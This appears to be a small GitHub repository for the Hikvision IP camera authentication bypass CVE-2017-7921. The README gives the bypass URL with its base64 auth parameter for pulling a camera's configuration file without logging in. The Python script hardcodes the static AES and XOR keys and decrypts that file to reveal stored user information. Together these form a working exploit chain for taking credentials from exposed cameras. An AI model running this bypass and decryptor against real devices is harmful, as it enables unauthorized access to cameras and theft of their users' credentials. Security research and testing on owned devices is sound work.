├── configurationFile
├── LICENSE
├── README.md
└── decrypt_configurationFile.py


/configurationFile:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor/HEAD/configurationFile


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 chrisjd20
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # hikvision_CVE-2017-7921_auth_bypass_config_decryptor
 2 | This python file will decrypt the configurationFile used by hikvision cameras vulnerable to CVE-2017-7921.
 3 | 
 4 | https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0876.html/
 5 | 
 6 | # Description 
 7 | 
 8 | Hikvision IP Cameras Authentication Bypass (CVE-2017-7921)
 9 | 
10 | Basically, hikvision cameras that are vulnerable to the CVE listed above, can have several routes exposed by using a simple base64 string supplied as an argument in the url. 
11 | 
12 | For example:
13 | 
14 | `/System/configurationFile?auth=YWRtaW46MTEK`
15 | 
16 | This would allow an unauthenticated user to download the config file for the camera which includes user information. This configuration file uses weak encryption and a static key by default.
17 | 
18 | The python script supplied, will decrypt this configuration file. 
19 | 
20 | I also supply a sample generated example configuration file for you to test. 
21 | 
22 | # How To Use
23 | 
24 | `./decrypt_configurationFile.py <nameofdownloadedconfig>`
25 | 
26 | 
27 | # Dependencies:
28 | 
29 | `sudo python3 -m pip install pycryptodome`
30 | 
31 | **Tested on Ubunut 20.04 with python 3.8.5**
32 | 


--------------------------------------------------------------------------------
/decrypt_configurationFile.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from itertools import cycle
 4 | from Crypto.Cipher import AES
 5 | import re
 6 | import os
 7 | import sys
 8 | 
 9 | def add_to_16(s):
10 |     while len(s) % 16 != 0:
11 |         s += b'\0'
12 |     return s 
13 | 
14 | def decrypt(ciphertext, hex_key='279977f62f6cfd2d91cd75b889ce0c9a'):
15 |     key = bytes.fromhex(hex_key)
16 |     ciphertext = add_to_16(ciphertext)
17 |     #iv = ciphertext[:AES.block_size]
18 |     cipher = AES.new(key, AES.MODE_ECB)
19 |     plaintext = cipher.decrypt(ciphertext[AES.block_size:])
20 |     return plaintext.rstrip(b"\0")
21 | 
22 | def xore(data, key=bytearray([0x73, 0x8B, 0x55, 0x44])):
23 |     return bytes(a ^ b for a, b in zip(data, cycle(key)))
24 | 
25 | def strings(file):
26 |     chars = r"A-Za-z0-9/\-:.,_$%'()[\]<> "
27 |     shortestReturnChar = 2
28 |     regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
29 |     pattern = re.compile(regExp)
30 |     return pattern.findall(file)
31 | 
32 | def main():
33 |     if len(sys.argv) <= 1 or not os.path.isfile(sys.argv[1]):
34 |         return print(f'No valid config file provided to decrypt. For example:\n{sys.argv[0]} <configfile>')
35 |     xor = xore( decrypt(open( sys.argv[1],'rb').read()) )
36 |     result_list = strings(xor.decode('ISO-8859-1'))
37 |     print(result_list)
38 | 
39 | if __name__ == '__main__':
40 |     main()
41 | 


--------------------------------------------------------------------------------